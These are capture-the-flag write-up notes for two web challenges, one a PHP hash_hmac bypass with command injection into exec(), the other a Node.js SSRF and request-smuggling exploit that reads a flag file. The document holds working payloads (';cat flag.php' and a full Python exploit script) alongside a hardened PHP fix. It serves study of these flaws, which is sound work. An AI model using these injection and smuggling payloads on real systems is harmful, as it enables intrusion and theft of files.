[羊城杯 2020] Blackcat
Key points
- hash_hmac() function bypass
Solution
```php
<?php
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('谁!竟敢踩我一只耳的尾巴!');
}
$clandestine = getenv("clandestine");
// If White-cat-monitor is supplied, the secret is replaced by an HMAC derived from it
if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
    die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}
// One-ear is concatenated directly into the shell command
echo exec("nc".$_POST['One-ear']);
```
The situation is clear: the key is unknown, so how can we know the value produced by the SHA-256 HMAC?
hash_hmac($algo, $data, $key, $binary)
If an array is passed as $data, the result of the hash is NULL.
Once that result is NULL, the key used by the next hash_hmac() call is empty, so we can compute the final digest ourselves.
Payload
```
Black-Cat-Sheriff=83a52f8ff4e399417109312e0539c80147b5514586c45a6caeb3681ad9c1a395&White-cat-monitor[]=0&One-ear=;dir
Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&White-cat-monitor[]=0&One-ear=;cat flag.php
```
The role of the ';': the sink is exec(), so ';' terminates the preceding nc and the command you want to run is appended after it.
Here I could not see the flag with the ls command, but with dir it was visible; I don't know why.
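As an added example (not the challenge's own code), the same check hardened against both bugs above: non-string POST fields are rejected before they reach hash_hmac(), the digest is compared with hash_equals(), and the argument handed to exec() is shell-escaped. The function name verify_sheriff and the fail-closed handling of a missing environment variable are assumptions.

```php
<?php
// Added example, not the original challenge code. verify_sheriff() is a
// hypothetical name; the secret is still read from the "clandestine" env var.
function verify_sheriff(array $post, string $clandestine): bool
{
    // hash_hmac() given an array as $data yields NULL on PHP 7 (and a TypeError
    // on PHP 8). A NULL key then degrades to '', which is how the bypass works,
    // so every field that can feed the HMAC must be a plain string.
    foreach (['Black-Cat-Sheriff', 'One-ear', 'White-cat-monitor'] as $field) {
        if (array_key_exists($field, $post) && !is_string($post[$field])) {
            return false;
        }
    }
    if (empty($post['Black-Cat-Sheriff']) || empty($post['One-ear'])) {
        return false;
    }
    $key = $clandestine;
    if (isset($post['White-cat-monitor'])) {
        $key = hash_hmac('sha256', $post['White-cat-monitor'], $key);
    }
    $expected = hash_hmac('sha256', $post['One-ear'], $key);
    // Constant-time comparison instead of !==, so timing does not leak the digest.
    return hash_equals($expected, $post['Black-Cat-Sheriff']);
}

// Fail closed if the secret is missing instead of silently using an empty key
// (assumed behaviour, not something the challenge does).
$clandestine = getenv("clandestine");
if ($clandestine === false || $clandestine === '') {
    die('server misconfigured');
}
if (!verify_sheriff($_POST, $clandestine)) {
    die('有意瞄准,无意击发');
}
// escapeshellarg() turns ";dir" into a single quoted argument to nc,
// so ';' can no longer chain a second command.
echo exec('nc ' . escapeshellarg($_POST['One-ear']));
```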
References
https://blog.csdn.net/K1ose/article/details/115434093
https://www.cnblogs.com/magic123/articles/17510131.html
[GYCTF2020] Node Game
Key points
- SSRF
- Node.js, Unicode character corruption
Solution
There is a source file.
There is a file upload endpoint (it checks that the client IP is 127.0.0.1): because the check uses remoteAddress, it cannot be forged with an HTTP header.
The server fetches a URL itself -> SSRF -> the request is issued by the server.
Payload [script from the internet]
```python
import urllib.parse
import requests

# First part of the smuggled request: the leading " HTTP/1.1" completes the
# request line the server builds around our input, then a second request to
# /file_upload follows. The two {} are filled with Content-Length and the body.
payload = ''' HTTP/1.1
Host: x
Connection: keep-alive
POST /file_upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryO9LPoNAg9lWRUItA
Content-Length: {}
cache-control: no-cache
Host: 127.0.0.1
Connection: keep-alive
{}'''
# Multipart body: a pug template that includes the flag file
body='''------WebKitFormBoundaryO9LPoNAg9lWRUItA
Content-Disposition: form-data; name="file"; filename="lmonstergg.pug"
Content-Type: ../template
doctype html
html
head
style
include ../../../../../../../flag.txt
------WebKitFormBoundaryO9LPoNAg9lWRUItA--
'''
# Trailing request that absorbs whatever the server appends after our input
more='''
GET /flag HTTP/1.1
Host: x
Connection: close
x:'''
payload = payload.format(len(body)+10,body)+more
payload = payload.replace("\n", "\r\n")
# Map every character c to U+FFxx: Node's HTTP client drops the high byte when
# it writes the request, so the CR/LF survive where they would otherwise be
# rejected (the "Unicode character corruption" noted above)
payload = ''.join(chr(int('0xff' + hex(ord(c))[2:].zfill(2), 16)) for c in payload)
print(payload)

session = requests.Session()
session.trust_env = False
# Trigger the server-side request, then read back the rendered template
session.get('http://7044c75e-31ef-49dc-8c66-b54adb18119c.node5.buuoj.cn:81/core?q=' + urllib.parse.quote(payload))
response = session.get('http://7044c75e-31ef-49dc-8c66-b54adb18119c.node5.buuoj.cn:81/?action=lmonstergg')
print(response.text)
```
References
dgg/article/details/119068329)